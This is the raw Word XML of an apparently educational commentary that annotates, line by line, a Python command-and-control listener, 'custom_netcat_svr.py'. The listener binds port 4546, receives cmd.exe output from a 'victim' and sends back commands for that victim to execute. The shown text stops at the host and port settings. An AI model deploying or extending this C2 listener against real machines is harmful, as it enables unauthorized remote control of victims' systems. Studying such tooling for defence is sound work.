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85799" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="00000000" w:rsidP="008F44A0">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>C2 Server Code Commentary &amp; Design Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C86FD" w14:textId="77777777" w:rsidR="008F44A0" w:rsidRDefault="008F44A0" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:before="240" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D0E086" w14:textId="4B80FD4F" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:before="240" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Line-by-Line Commented C2 Server Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BBAFF0" w14:textId="6D39BAC7" w:rsidR="006E1B12" w:rsidRDefault="00DA6973" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093698E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The following section contains the fully annotated source code for 'custom_netcat_svr.py', detailing the programmatic role and security implications of each configuration directive, import, loop, and thread invocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3C284" w14:textId="77777777" w:rsidR="0093698E" w:rsidRPr="0093698E" w:rsidRDefault="0093698E" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F593BF0" w14:textId="1AC302A0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import socket </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import the standard socket library to enable low-level TCP/IP network communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D5768" w14:textId="461124F1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import subprocess </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import subprocess to allow running system commands (though not directly invoked in this snippet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EEF5F1" w14:textId="6AF141D5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import sys </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import sys to interact with system-specific parameters and functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DEB22" w14:textId="2D34C3E9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import time </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import time to handle execution pauses and sleep timers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50121CE4" w14:textId="24DEBD91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import threading </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import threading to run tasks concurrently without freezing the main execution loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB30BE" w14:textId="5B3C04B6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import asyncio </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import asyncio for asynchronous functionality (imported but kept as an alternative approach here).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9C1AB" w14:textId="7F5903D6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import io </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import io to manage stream handling and in-memory text/binary data buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F476C06" w14:textId="4DA26044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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"># Import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"> to interact with the underlying operating system commands and process lifecycle control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22081725" w14:textId="351276A4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#import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>readline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Commented out import for terminal interactive line editing and history management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CAEC0" w14:textId="083E21E2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import colorama </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Import colorama to easily enable stylized, multi-colored text output in the terminal console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0378BA18" w14:textId="5000BF65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>from colorama import Fore, Back, Style</w:t>
      </w:r>
      <w:r w:rsidR="00DA6973" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Extract specific text attributes (Fore=Foreground color, Back=Background, Style=Font style).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987E2FD" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1BED8E" w14:textId="47BB5737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>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>receive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cmd.exe shell command output from the client</w:t>
      </w:r>
      <w:r w:rsidR="00DA6973" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Comment header outlining the shell output receiver routine from the connection loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33756523" w14:textId="5E2EF88E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def shellreceiver(conn): </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Define an asynchronous thread target function to receive execution output from the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B5AFA1" w14:textId="5718F379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    while True:</w:t>
      </w:r>
      <w:r w:rsidR="00DA6973" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Enter an infinite loop to continually monitor the socket for incoming data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F8B02" w14:textId="10701944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        try: </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Initialize error handling context to insulate the execution block against network disconnect errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77248532" w14:textId="30F2B2D2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            data=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conn.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Read incoming data from the established socket connection 1 byte at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16B537" w14:textId="7DFF8945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            print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>data.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(), end="", flush=True) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Decode the raw binary stream data into readable text and print it immediately to the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532E81B" w14:textId="41472A42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        except:</w:t>
      </w:r>
      <w:r w:rsidR="00DA6973" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Error management catch block: If data reading fails, assume the connection dropped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF2793" w14:textId="0DF2FD5D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            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"server/socket must have died...time to hop off")</w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"> # Print warning output indicating socket termination states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E3573" w14:textId="3ABDF2D8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            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conn.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Gracefully terminate the communication line to free up local network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47757124" w14:textId="2E6ED2E3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            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>._exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">0) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"># Force </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"> the entire Python server process immediately with exit status 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F824F49" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4528A239" w14:textId="13E6C829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>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> our command we'd like executed on the victim/client!</w:t>
      </w:r>
      <w:r w:rsidR="00CC5678" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Comment header highlighting the operator command push mechanics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4448A" w14:textId="515FCA58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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>shellsender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(conn): </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Define an asynchronous thread target function to prompt the operator and send commands to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26482F" w14:textId="28DA6862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    while True: </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Enter an infinite loop to continuously accept instructions from the C2 console operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC1C0D" w14:textId="68ADAFC1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        mycmd=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>input(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">"") </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Halt execution and wait for the server operator to type a command into the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCE48F" w14:textId="53628190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        mycmd=mycmd+"\n" </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Append a newline character to signify the command termination/execution trigger for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B990083" w14:textId="33FC6D76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        try: </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Open error safety wrapper block for data serialization and network transmission lines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B59522" w14:textId="712A8BFC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            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conn.send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mycmd.encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">()) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Convert the string command into a raw byte stream and transmit it across the network socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26F047" w14:textId="190E7FD6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        except: </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Error management: Catch connection breakages while attempting transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC8CBC" w14:textId="6B2A2F27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            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"server/socket must have died...time to hop off")</w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"> # Print alert noting the connection failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64100A4C" w14:textId="274CA4AE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            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conn.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Safely close the active network link descriptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667E524" w14:textId="7A277165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            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>._exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">0) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Immediate operational shutdown of the active Python script runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE869E" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100F54DC" w14:textId="702B0A79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host = "0.0.0.0" </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Set the binding interface. '0.0.0.0' configures the server to listen on all available network cards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37374055" w14:textId="1BC364EC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port = 4546 </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Specify the network port identification integer where the C2 listener will establish its presence.</w:t>
      </w:r>
    </w:p>
